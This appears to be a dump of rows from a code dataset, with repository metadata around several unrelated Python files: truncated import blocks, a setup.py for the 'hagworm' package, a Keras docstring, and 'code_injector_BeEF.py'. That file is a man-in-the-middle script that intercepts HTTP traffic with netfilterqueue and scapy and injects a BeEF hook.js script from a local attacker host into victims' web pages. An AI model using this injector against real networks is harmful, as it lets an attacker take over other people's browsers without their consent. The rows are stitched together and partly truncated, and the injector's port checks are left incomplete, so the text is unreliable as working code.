] | null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
| 25.912281 | 69 | 0.613067 |
c7b4d983814129255c3038e65a92199d05319e32 | 6,061 | py | Python | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | 1 | 2021-04-13T03:14:01.000Z | 2021-04-13T03:14:01.000Z | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | null | null | null | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | null | null | null | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
| 33.120219 | 123 | 0.620855 |
c7b509b05f7f3079575b9250d0a2891a9795c878 | 1,554 | py | Python | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'wsb310@gmail.com',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| 28.254545 | 62 | 0.548263 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
| 38.4 | 113 | 0.823893 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.02 | 90 | 0.622366 |